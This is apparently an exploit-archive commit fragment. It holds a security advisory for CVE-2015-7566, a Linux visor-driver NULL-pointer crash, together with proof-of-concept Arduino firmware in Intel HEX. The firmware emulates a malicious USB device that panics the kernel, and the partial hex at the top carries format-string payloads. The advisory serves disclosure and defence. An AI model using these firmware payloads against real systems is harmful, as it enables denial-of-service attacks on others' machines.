:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:10142400000000402D08000200010102030109022E
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF

622
platforms/linux/dos/39540.txt Executable file
View file

@ -0,0 +1,622 @@
OS-S Security Advisory 2016-09
Linux visor clie_5_attach Nullpointer Dereference
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2015-7566
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid
USB device descriptors (visor clie_5_attach driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net/advisories/OSS-2016-09_visor_clie_5_attach.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the visor (clie_5_attach) driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x54c
idProduct: 0x144
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
The clie_5_attach function of the visor driver, which is called during the
driver initialization process, expects an OUT-Bulk-Endpoint.
Due to an incomplete sanity check, the visor driver tries to dereference null-
pointers.
This results in a crash of the system.
****
$ nm visor.ko.debug | grep clie_5_attach
0000000000000030 t clie_5_attach
$ addr2line -e visor.ko.debug 6d
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/serial/visor.c:610
****
**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/visor.c)
...
607
608 pipe = usb_sndbulkpipe(serial->dev, port->bulk_out_endpointAddress);
609 for (j = 0; j < ARRAY_SIZE(port->write_urbs); ++j)
610 port->write_urbs[j]->pipe = pipe; /* if there is no configured OUT-
bulk-endpoint, the kernel tries to dereference null-pointers */
611
612 return 0;
613 }
...
****
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81 ï?? IN-Direction
bmAttribut: 0x1 ï?? ISO-Transfer
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1 ï??OUT-Direction
bmAttribut: 0x1 ï??ISO-Transfer (change this
value to 0x2, which is the value for bulk-transfer without additional
features, and the visor driver won't crash)
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82 ï??IN-Direction
bmAttribut: 0x1 ï??ISO-Transfer
wMaxPacketSize: 0x4
bInterval: 0xc
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
This bug was fixed upstream. A CVE number was not assigned.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283371
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i
d=cb3232138e37129e88240a98a1d2aba2187ff57c
Kernel Stacktrace:
[ 34.568077] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 34.791731] usb 1-1: New USB device found, idVendor=054c, idProduct=0144
[ 34.795463] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 34.799619] usb 1-1: Product: Ä?
[ 34.804592] usb 1-1: Manufacturer: Ä?
[ 34.810144] usb 1-1: SerialNumber: %
[ 34.872285] usbcore: registered new interface driver visor
[ 34.879838] usbserial: USB Serial support registered for Handspring Visor /
Palm OS
[ 34.890481] usbserial: USB Serial support registered for Sony Clie 5.0
[ 34.897769] usbserial: USB Serial support registered for Sony Clie 3.5
[ 34.914162] visor 1-1:1.0: Sony Clie 5.0 converter detected
[ 34.920288] BUG: unable to handle kernel NULL pointer dereference at
0000000000000058
[ 34.921136] IP: [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]
[ 34.921136] PGD 0
[ 34.921136] Oops: 0002 [#1] SMP
[ 34.921136] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT
xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables
ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle
ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat
nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack
iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm
ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4
i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif
cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy
dm_mirror dm_region_hash dm_log dm_mod
[ 34.921136] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 34.921136] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 34.921136] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 34.921136] RIP: 0010:[<ffffffffa039306d>] [<ffffffffa039306d>]
clie_5_attach+0x3d/0x60 [visor]
[ 34.921136] RSP: 0018:ffff88000bd23a80 EFLAGS: 00010286
[ 34.921136] RAX: 00000000c0000200 RBX: ffff88000af979d0 RCX: 0000000000000000
[ 34.921136] RDX: ffff88000be6b000 RSI: ffff88000af979c0 RDI: ffff88000af979c0
[ 34.921136] RBP: ffff88000bd23a80 R08: 0000000000000000 R09: 0000000000000000
[ 34.921136] R10: 0000000000000000 R11: ffff88000c3b9800 R12: ffff88000af979d0
[ 34.921136] R13: ffff88000c525830 R14: ffff88000af979c0 R15: ffffffffa0395200
[ 34.921136] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 34.921136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 34.921136] CR2: 0000000000000058 CR3: 000000000d2a1000 CR4:
00000000000006f0
[ 34.921136] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 34.921136] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 34.921136] Stack:
[ 34.921136] ffff88000bd23c18 ffffffff8145fed1 0000000000000007 000000020bd23af8
[ 34.921136] ffff88000c525830 0000000000000000 0000000000000000 ffffffff00000000
[ 34.921136] ffff88000bcd0000 ffff880000000001 ffff88000bcd0090 0000000000000000
[ 34.921136] Call Trace:
[ 34.921136] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230
[ 34.921136] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 34.921136] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 34.921136] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 34.921136] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 34.921136] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 34.921136] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 34.921136] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 34.921136] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 34.921136] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 34.921136] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 34.921136] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 34.921136] [<ffffffffa0398000>] ? 0xffffffffa0397fff
[ 34.921136] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]
[ 34.921136] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 34.921136] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 34.921136] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 34.921136] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 34.921136] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 34.921136] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 34.921136] Code: 28 48 8b 57 20 0f b6 80 28 02 00 00 88 82 28 02 00 00 48
8b 0f c1 e0 0f 0d 00 00 00 c0 8b 09 c1 e1 08 09 c8 48 8b 8a 10 02 00 00 <89>
41 58 48 8b 92 18 02 00 00 89 42 58 31 c0 5d c3 66 90 b8 ff
[ 34.921136] RIP [<ffffffffa039306d>] clie_5_attach+0x3d/0x60 [visor]
[ 34.921136] RSP <ffff88000bd23a80>
[ 34.921136] CR2: 0000000000000058
[ 35.341720] ---[ end trace b239663354a1c556 ]---
[ 35.347341] Kernel panic - not syncing: Fatal exception
[ 35.348314] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
